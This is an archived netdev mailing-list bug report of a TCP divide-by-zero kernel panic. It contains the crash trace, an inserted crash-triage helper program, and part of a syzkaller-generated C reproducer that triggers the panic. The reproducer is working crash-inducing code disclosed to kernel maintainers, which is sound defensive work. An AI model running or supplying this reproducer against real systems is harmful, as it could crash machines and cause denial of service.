netdev.vger.kernel.org archive mirror
* net/ipv4: divide error in __tcp_select_window
@ 2017-08-31  5:56 idaifish
  2017-08-31 11:11 ` Neal Cardwell
  0 siblings, 1 reply; 4+ messages in thread
From: idaifish @ 2017-08-31  5:56 UTC (permalink / raw)
  To: davem, Alexey Kuznetsov; +Cc: netdev, syzkaller

[-- Attachment #1: Type: text/plain, Size: 2622 bytes --]

Hi:
   This bug still seems to be triggerable by the attached PoC on the latest
Ubuntu 16.04 kernel (4.4.0-94-generic).

============================================================================
divide error: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff880076ab9900 task.stack: ffff880062ae8000
RIP: 0010:[<ffffffff829c1df3>]  [<ffffffff829c1df3>]
__tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP: 0018:ffff880062aef6e8  EFLAGS: 00010283
RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000
RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085
RBP: ffff880062aef728 R08: 0000000000001800 R09: 0000000000000002
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001
FS:  00007f15c239a700(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000002001c000 CR3: 0000000079628000 CR4: 00000000000006f0
DR0: 0000000000008000 DR1: 0000000000008000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
 ffff880062aef6e8 ffff880062aef6e8 0000000000000000 ffff880079adca40
 0000000000000000 0000000000000436 ffff880079adcae8 0000000000000436
 ffff880062aef758 ffffffff8297c36e 0000000000000068 0000000000000000
Call Trace:
 [<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
 [<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
 [<ffffffff82a3c32e>] inet_recvmsg+0x26e/0x3b0 net/ipv4/af_inet.c:765
 [<ffffffff827c84aa>] sock_recvmsg_nosec+0x8a/0xb0 net/socket.c:723
 [<ffffffff827d0849>] ___sys_recvmsg+0x229/0x510 net/socket.c:2113
 [<ffffffff827d25fe>] __sys_recvmmsg+0x23e/0x660 net/socket.c:2221
 [<ffffffff827d2aff>] SYSC_recvmmsg net/socket.c:2302 [inline]
 [<ffffffff827d2aff>] SyS_recvmmsg+0xdf/0x180 net/socket.c:2286
 [<ffffffff82dfb3b7>] entry_SYSCALL_64_fastpath+0x1a/0xa9
Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45
d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41>
f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04
RIP  [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0
net/ipv4/tcp_output.c:2499
 RSP <ffff880062aef6e8>
---[ end trace 771dfab907a5c7aa ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
Rebooting in 86400 seconds..
================================================================================


-- 
Regards,
idaifish

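The faulting bytes in the Code: line above, `<41> f7 fe`, decode to `idiv r14d`, and the register dump shows R14 = 0, so the oops is a 32-bit signed division by a zero divisor held in r14d; the bytes that follow (`41 0f af c6`, `imul eax, r14d`) have the shape of rounding a value down to a multiple of that same divisor. The program below is an added triage helper, not part of idaifish's report or of syzkaller: it parses a kernel Code: line, decodes a register-direct div/idiv at the fault marker, and looks the divisor register up in the register dump. Both input strings are copied from the report above. It handles only the `F7 /6` (div) and `F7 /7` (idiv) register forms with at most one REX prefix, which is all this report needs.

```c
/* Added crash-triage helper (not from the original report or syzkaller). */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copied from the report above: the Code: line and the relevant registers. */
static const char *kCodeLine =
    "Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45 "
    "d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41> "
    "f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04";
static const char *kRegDump =
    "RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000\n"
    "RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085\n"
    "R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac\n"
    "R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001\n";

/* Register names as they appear in an x86-64 oops, indexed by encoding. */
static const char *kReg64[16] = {"RAX", "RCX", "RDX", "RBX", "RSP", "RBP",
                                 "RSI", "RDI", "R8",  "R9",  "R10", "R11",
                                 "R12", "R13", "R14", "R15"};

/* Parse "Code: xx xx <xx> xx ..." into bytes; *fault_idx receives the index
 * of the byte wrapped in <>, or (size_t)-1 if there is no marker. */
size_t parse_code_line(const char *line, unsigned char *out, size_t max,
                       size_t *fault_idx)
{
    size_t n = 0;
    const char *p = line;
    if (strncmp(p, "Code:", 5) == 0) p += 5;
    *fault_idx = (size_t)-1;
    while (*p && n < max) {
        while (*p == ' ') p++;
        int marked = (*p == '<');
        if (marked) p++;
        if (!isxdigit((unsigned char)p[0]) || !isxdigit((unsigned char)p[1])) break;
        char hex[3] = {p[0], p[1], 0};
        out[n] = (unsigned char)strtoul(hex, NULL, 16);
        p += 2;
        if (marked) {
            if (*p != '>') break;
            p++;
            *fault_idx = n;
        }
        n++;
    }
    return n;
}

/* Decode F7 /6 (div r/m32) or F7 /7 (idiv r/m32) with a register operand and
 * an optional REX prefix. Returns the divisor register number or -1. */
int decode_div_reg(const unsigned char *code, size_t len, size_t idx, int *is_signed)
{
    int rex_b = 0;
    if (idx < len && (code[idx] & 0xF0) == 0x40) { rex_b = code[idx] & 1; idx++; }
    if (idx + 1 >= len || code[idx] != 0xF7) return -1;
    unsigned char modrm = code[idx + 1];
    if ((modrm & 0xC0) != 0xC0) return -1;      /* memory operand: not handled */
    int reg_field = (modrm >> 3) & 7;
    if (reg_field != 6 && reg_field != 7) return -1;
    if (is_signed) *is_signed = (reg_field == 7);
    return (modrm & 7) | (rex_b << 3);
}

/* Look up "NAME: <hex>" in the register dump. Returns 1 on success. */
int find_reg(const char *dump, const char *name, unsigned long long *val)
{
    char key[16];
    snprintf(key, sizeof key, "%s: ", name);
    const char *p = strstr(dump, key);
    if (!p) return 0;
    *val = strtoull(p + strlen(key), NULL, 16);
    return 1;
}

/* Returns 1 when the marked instruction is a div/idiv whose divisor register
 * is zero in the dump; 'why' always receives a one-line explanation. */
int triage_divide_error(const char *code_line, const char *dump, char *why, size_t why_len)
{
    unsigned char code[64];
    size_t fault;
    size_t n = parse_code_line(code_line, code, sizeof code, &fault);
    if (n == 0 || fault == (size_t)-1) {
        snprintf(why, why_len, "no fault marker in Code: line");
        return 0;
    }
    int is_signed = 0;
    int reg = decode_div_reg(code, n, fault, &is_signed);
    if (reg < 0) {
        snprintf(why, why_len, "marked instruction is not a div/idiv by register");
        return 0;
    }
    unsigned long long v;
    if (!find_reg(dump, kReg64[reg], &v)) {
        snprintf(why, why_len, "%s not present in register dump", kReg64[reg]);
        return 0;
    }
    snprintf(why, why_len, "%s by low 32 bits of %s, %s = 0x%llx",
             is_signed ? "idiv" : "div", kReg64[reg], kReg64[reg], v);
    return v == 0;
}

int main(void)
{
    char why[128];
    int hit = triage_divide_error(kCodeLine, kRegDump, why, sizeof why);
    printf("%s: %s\n", hit ? "divide by zero confirmed" : "not confirmed", why);
    return hit ? 0 : 1;
}
```

On this report the helper prints "divide by zero confirmed: idiv by low 32 bits of R14, R14 = 0x0", which is the fact to carry into the root-cause analysis: whatever feeds r14d at tcp_output.c:2499 (the MSS-sized divisor in __tcp_select_window) reached zero on this socket, and the fix belongs at the point where that value is derived or clamped, not at the division.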
[-- Attachment #2: report.txt --]
[-- Type: text/plain, Size: 2334 bytes --]

[-- Attachment #3: poc.c --]
[-- Type: text/x-csrc, Size: 38406 bytes --]

// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <dirent.h>
#include <errno.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

const int kFailStatus = 67;
const int kRetryStatus = 69;

__attribute__((noreturn)) static void doexit(int status)
{
  volatile unsigned i;
  syscall(__NR_exit_group, status);
  for (i = 0;; i++) {
  }
}

__attribute__((noreturn)) static void fail(const char* msg, ...)
{
  int e = errno;
  fflush(stdout);
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit((e == ENOMEM || e == EAGAIN) ? kRetryStatus : kFailStatus);
}

__attribute__((noreturn)) static void exitf(const char* msg, ...)
{
  int e = errno;
  fflush(stdout);
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit(kRetryStatus);
}

static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* uctx)
{
  uintptr_t addr = (uintptr_t)info->si_addr;
  const uintptr_t prog_start = 1 << 20;
  const uintptr_t prog_end = 100 << 20;
  if (__atomic_load_n(&skip_segv, __ATOMIC_RELAXED) &&
      (addr < prog_start || addr > prog_end)) {
    _longjmp(segv_env, 1);
  }
  doexit(sig);
  for (;;) {
  }
}

static void install_segv_handler()
{
  struct sigaction sa;

  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = SIG_IGN;
  syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
  syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);

  memset(&sa, 0, sizeof(sa));
  sa.sa_sigaction = segv_handler;
  sa.sa_flags = SA_NODEFER | SA_SIGINFO;
  sigaction(SIGSEGV, &sa, NULL);
  sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...)                                                \
  {                                                                    \
    __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST);               \
    if (_setjmp(segv_env) == 0) {                                      \
      __VA_ARGS__;                                                     \
    }                                                                  \
    __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST);               \
  }

static void use_temporary_dir()
{
  char tmpdir_template[] = "./syzkaller.XXXXXX";
  char* tmpdir = mkdtemp(tmpdir_template);
  if (!tmpdir)
    fail("failed to mkdtemp");
  if (chmod(tmpdir, 0777))
    fail("failed to chmod");
  if (chdir(tmpdir))
    fail("failed to chdir");
}

static void remove_dir(const char* dir)
{
  DIR* dp;
  struct dirent* ep;
  int iter = 0;
retry:
  dp = opendir(dir);
  if (dp == NULL) {
    if (errno == EMFILE) {
      exitf("opendir(%s) failed due to NOFILE, exiting", dir);
    }
    exitf("opendir(%s) failed", dir);
  }
  while ((ep = readdir(dp))) {
    if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0)
      continue;
    char filename[FILENAME_MAX];
    snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name);
    struct stat st;
    if (lstat(filename, &st))
      exitf("lstat(%s) failed", filename);
    if (S_ISDIR(st.st_mode)) {
      remove_dir(filename);
      continue;
    }
    int i;
    for (i = 0;; i++) {
      if (unlink(filename) == 0)
        break;
      if (errno == EROFS) {
        break;
      }
      if (errno != EBUSY || i > 100)
        exitf("unlink(%s) failed", filename);
      if (umount2(filename, MNT_DETACH))
        exitf("umount(%s) failed", filename);
    }
  }
  closedir(dp);
  int i;
  for (i = 0;; i++) {
    if (rmdir(dir) == 0)
      break;
    if (i < 100) {
      if (errno == EROFS) {
        break;
      }
      if (errno == EBUSY) {
        if (umount2(dir, MNT_DETACH))
          exitf("umount(%s) failed", dir);
        continue;
      }
      if (errno == ENOTEMPTY) {
        if (iter < 100) {
          iter++;
          goto retry;
        }
      }
    }
    exitf("rmdir(%s) failed", dir);
  }
}

static uint64_t current_time_ms()
{
  struct timespec ts;

  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    fail("clock_gettime failed");
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void test();

void loop()
{
  int iter;
  for (iter = 0;; iter++) {
    char cwdbuf[256];
    sprintf(cwdbuf, "./%d", iter);
    if (mkdir(cwdbuf, 0777))
      fail("failed to mkdir");
    int pid = fork();
    if (pid < 0)
      fail("clone failed");
    if (pid == 0) {
      prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
      setpgrp();
      if (chdir(cwdbuf))
        fail("failed to chdir");
      test();
      doexit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      int res = waitpid(-1, &status, __WALL | WNOHANG);
      if (res == pid)
        break;
      usleep(1000);
      if (current_time_ms() - start > 5 * 1000) {
        kill(-pid, SIGKILL);
        kill(pid, SIGKILL);
        while (waitpid(-1, &status, __WALL) != pid) {
        }
        break;
      }
    }
    remove_dir(cwdbuf);
  }
}

long r[212];
void* thr(void* arg)
{
  switch ((long)arg) {
  case 0:
    r[0] = syscall(__NR_mmap, 0x20000000ul, 0x1b000ul, 0x3ul, 0x32ul,
                   0xfffffffffffffffful, 0x0ul);
    break;
  case 1:
    r[1] = syscall(__NR_socket, 0x2ul, 0x1ul, 0x0ul);
    break;
  case 2:
    NONFAILING(*(uint32_t*)0x20018ffc = (uint32_t)0x0);
    r[3] = syscall(__NR_setsockopt, r[1], 0x1ul, 0x8ul, 0x20018ffcul,
                   0x4ul);
    break;
  case 3:
    NONFAILING(*(uint16_t*)0x20004000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x20004002 = (uint16_t)0x204e);
    NONFAILING(*(uint32_t*)0x20004004 = (uint32_t)0x12000000);
    NONFAILING(*(uint8_t*)0x20004008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x20004009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400f = (uint8_t)0x0);
    r[15] = syscall(__NR_bind, r[1], 0x20004000ul, 0x10ul);
    break;
  case 4:
    NONFAILING(*(uint16_t*)0x20003000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x20003002 = (uint16_t)0x204e);
    NONFAILING(*(uint32_t*)0x20003004 = (uint32_t)0x100007f);
    NONFAILING(*(uint8_t*)0x20003008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x20003009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300f = (uint8_t)0x0);
    r[27] = syscall(__NR_connect, r[1], 0x20003000ul, 0x10ul);
    break;
  case 5:
    r[28] = syscall(__NR_mmap, 0x2001c000ul, 0x1000ul, 0x1ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 6:
    r[29] = syscall(__NR_mmap, 0x2001d000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 7:
    r[30] = syscall(__NR_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 8:
    r[31] = syscall(__NR_mmap, 0x20023000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 9:
    r[32] = syscall(__NR_mmap, 0x2002b000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 10:
    NONFAILING(*(uint64_t*)0x2002bdc0 = (uint64_t)0x20000000);
    NONFAILING(*(uint32_t*)0x2002bdc8 = (uint32_t)0x8);
    NONFAILING(*(uint64_t*)0x2002bdd0 = (uint64_t)0x20022fa0);
    NONFAILING(*(uint64_t*)0x2002bdd8 = (uint64_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bde0 = (uint64_t)0x20022000);
    NONFAILING(*(uint64_t*)0x2002bde8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bdf0 = (uint32_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bdf8 = (uint32_t)0x101);
    NONFAILING(*(uint64_t*)0x2002be00 = (uint64_t)0x20023ff0);
    NONFAILING(*(uint32_t*)0x2002be08 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002be10 = (uint64_t)0x20001000);
    NONFAILING(*(uint64_t*)0x2002be18 = (uint64_t)0x6);
    NONFAILING(*(uint64_t*)0x2002be20 = (uint64_t)0x2000d000);
    NONFAILING(*(uint64_t*)0x2002be28 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002be30 = (uint32_t)0x6);
    NONFAILING(*(uint32_t*)0x2002be38 = (uint32_t)0x80000000);
    NONFAILING(*(uint64_t*)0x2002be40 = (uint64_t)0x20024ffa);
    NONFAILING(*(uint32_t*)0x2002be48 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002be50 = (uint64_t)0x2001f000);
    NONFAILING(*(uint64_t*)0x2002be58 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2002be60 = (uint64_t)0x20024000);
    NONFAILING(*(uint64_t*)0x2002be68 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002be70 = (uint32_t)0x2);
    NONFAILING(*(uint32_t*)0x2002be78 = (uint32_t)0x4);
    NONFAILING(*(uint64_t*)0x2002be80 = (uint64_t)0x20025000);
    NONFAILING(*(uint32_t*)0x2002be88 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002be90 = (uint64_t)0x20009000);
    NONFAILING(*(uint64_t*)0x2002be98 = (uint64_t)0x1);
    NONFAILING(*(uint64_t*)0x2002bea0 = (uint64_t)0x20025fe7);
    NONFAILING(*(uint64_t*)0x2002bea8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002beb0 = (uint32_t)0x8);
    NONFAILING(*(uint32_t*)0x2002beb8 = (uint32_t)0x101);
    NONFAILING(*(uint64_t*)0x2002bec0 = (uint64_t)0x20025000);
    NONFAILING(*(uint32_t*)0x2002bec8 = (uint32_t)0x58);
    NONFAILING(*(uint64_t*)0x2002bed0 = (uint64_t)0x2000cfb0);
    NONFAILING(*(uint64_t*)0x2002bed8 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bee0 = (uint64_t)0x20026000);
    NONFAILING(*(uint64_t*)0x2002bee8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bef0 = (uint32_t)0xffff);
    NONFAILING(*(uint32_t*)0x2002bef8 = (uint32_t)0x46);
    NONFAILING(*(uint64_t*)0x2002bf00 = (uint64_t)0x20027ffa);
    NONFAILING(*(uint32_t*)0x2002bf08 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bf10 = (uint64_t)0x20004f90);
    NONFAILING(*(uint64_t*)0x2002bf18 = (uint64_t)0x7);
    NONFAILING(*(uint64_t*)0x2002bf20 = (uint64_t)0x20016000);
    NONFAILING(*(uint64_t*)0x2002bf28 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bf30 = (uint32_t)0x6);
    NONFAILING(*(uint32_t*)0x2002bf38 = (uint32_t)0x1ff);
    NONFAILING(*(uint64_t*)0x2002bf40 = (uint64_t)0x20000ff0);
    NONFAILING(*(uint32_t*)0x2002bf48 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bf50 = (uint64_t)0x20028000);
    NONFAILING(*(uint64_t*)0x2002bf58 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bf60 = (uint64_t)0x20017000);
    NONFAILING(*(uint64_t*)0x2002bf68 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bf70 = (uint32_t)0x3);
    NONFAILING(*(uint32_t*)0x2002bf78 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bf80 = (uint64_t)0x2001c000);
    NONFAILING(*(uint32_t*)0x2002bf88 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bf90 = (uint64_t)0x2000bfc0);
    NONFAILING(*(uint64_t*)0x2002bf98 = (uint64_t)0x4);
    NONFAILING(*(uint64_t*)0x2002bfa0 = (uint64_t)0x20029fdf);
    NONFAILING(*(uint64_t*)0x2002bfa8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bfb0 = (uint32_t)0x4);
    NONFAILING(*(uint32_t*)0x2002bfb8 = (uint32_t)0x0);
    NONFAILING(*(uint64_t*)0x2002bfc0 = (uint64_t)0x20015b87);
    NONFAILING(*(uint32_t*)0x2002bfc8 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bfd0 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x2002bfd8 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bfe0 = (uint64_t)0x20012f3f);
    NONFAILING(*(uint64_t*)0x2002bfe8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bff0 = (uint32_t)0x51d);
    NONFAILING(*(uint32_t*)0x2002bff8 = (uint32_t)0x400);
    NONFAILING(*(uint64_t*)0x20022fa0 = (uint64_t)0x20002000);
    NONFAILING(*(uint64_t*)0x20022fa8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fb0 = (uint64_t)0x20001f9c);
    NONFAILING(*(uint64_t*)0x20022fb8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fc0 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x20022fc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fd0 = (uint64_t)0x2001d000);
    NONFAILING(*(uint64_t*)0x20022fd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fe0 = (uint64_t)0x20009000);
    NONFAILING(*(uint64_t*)0x20022fe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022ff0 = (uint64_t)0x20005fd1);
    NONFAILING(*(uint64_t*)0x20022ff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001000 = (uint64_t)0x2001d000);
    NONFAILING(*(uint64_t*)0x20001008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001010 = (uint64_t)0x20016f90);
    NONFAILING(*(uint64_t*)0x20001018 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001020 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x20001028 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001030 = (uint64_t)0x20023000);
    NONFAILING(*(uint64_t*)0x20001038 = (uint64_t)0x1000);
    NONFAILING(*(uint64_t*)0x20001040 = (uint64_t)0x20023f80);
    NONFAILING(*(uint64_t*)0x20001048 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001050 = (uint64_t)0x20021000);
    NONFAILING(*(uint64_t*)0x20001058 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20009000 = (uint64_t)0x20020000);
    NONFAILING(*(uint64_t*)0x20009008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfb0 = (uint64_t)0x2000d000);
    NONFAILING(*(uint64_t*)0x2000cfb8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfc0 = (uint64_t)0x20026f0e);
    NONFAILING(*(uint64_t*)0x2000cfc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfd0 = (uint64_t)0x20026fcc);
    NONFAILING(*(uint64_t*)0x2000cfd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfe0 = (uint64_t)0x20026000);
    NONFAILING(*(uint64_t*)0x2000cfe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cff0 = (uint64_t)0x2000b000);
    NONFAILING(*(uint64_t*)0x2000cff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004f90 = (uint64_t)0x20027f2c);
    NONFAILING(*(uint64_t*)0x20004f98 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fa0 = (uint64_t)0x2000a000);
    NONFAILING(*(uint64_t*)0x20004fa8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fb0 = (uint64_t)0x20027ff3);
    NONFAILING(*(uint64_t*)0x20004fb8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fc0 = (uint64_t)0x20027000);
    NONFAILING(*(uint64_t*)0x20004fc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fd0 = (uint64_t)0x20009ff4);
    NONFAILING(*(uint64_t*)0x20004fd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fe0 = (uint64_t)0x2001d000);
    NONFAILING(*(uint64_t*)0x20004fe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004ff0 = (uint64_t)0x20005000);
    NONFAILING(*(uint64_t*)0x20004ff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028000 = (uint64_t)0x20028fb6);
    NONFAILING(*(uint64_t*)0x20028008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028010 = (uint64_t)0x20008000);
    NONFAILING(*(uint64_t*)0x20028018 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028020 = (uint64_t)0x20028000);
    NONFAILING(*(uint64_t*)0x20028028 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028030 = (uint64_t)0x20028fa9);
    NONFAILING(*(uint64_t*)0x20028038 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028040 = (uint64_t)0x20001000);
    NONFAILING(*(uint64_t*)0x20028048 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000bfc0 = (uint64_t)0x20029000);
    NONFAILING(*(uint64_t*)0x2000bfc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000bfd0 = (uint64_t)0x2001c000);
    NONFAILING(*(uint64_t*)0x2000bfd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000bfe0 = (uint64_t)0x20029000);
    NONFAILING(*(uint64_t*)0x2000bfe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000bff0 = (uint64_t)0x20029f28);
    NONFAILING(*(uint64_t*)0x2000bff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20000000 = (uint64_t)0x20028000);
    NONFAILING(*(uint64_t*)0x20000008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20000010 = (uint64_t)0x20001fc9);
    NONFAILING(*(uint64_t*)0x20000018 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20000020 = (uint64_t)0x2002a000);
    NONFAILING(*(uint64_t*)0x20000028 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20000030 = (uint64_t)0x2002af4c);
    NONFAILING(*(uint64_t*)0x20000038 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20000040 = (uint64_t)0x2002af80);
    NONFAILING(*(uint64_t*)0x20000048 = (uint64_t)0x0);
    r[183] = syscall(__NR_recvmmsg, r[1], 0x2002bdc0ul, 0x9ul, 0x102ul,
                     0x20000000ul);
    break;
  case 11:
    NONFAILING(*(uint64_t*)0x20007000 = (uint64_t)0x2000e67e);
    NONFAILING(*(uint64_t*)0x20007008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20007010 = (uint64_t)0x20012f53);
    NONFAILING(*(uint64_t*)0x20007018 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20007020 = (uint64_t)0x20007fb7);
    NONFAILING(*(uint64_t*)0x20007028 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20007030 = (uint64_t)0x20013f86);
    NONFAILING(*(uint64_t*)0x20007038 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20007040 = (uint64_t)0x20014000);
    NONFAILING(*(uint64_t*)0x20007048 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20007050 = (uint64_t)0x20015fc7);
    NONFAILING(*(uint64_t*)0x20007058 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20007060 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x20007068 = (uint64_t)0x1000);
    NONFAILING(memcpy(
        (void*)0x20000000,
        "\x12\x33\x6d\xe8\x81\xf2\x48\x71\xc3\x65\x47\xbb\xde\x16\xca"
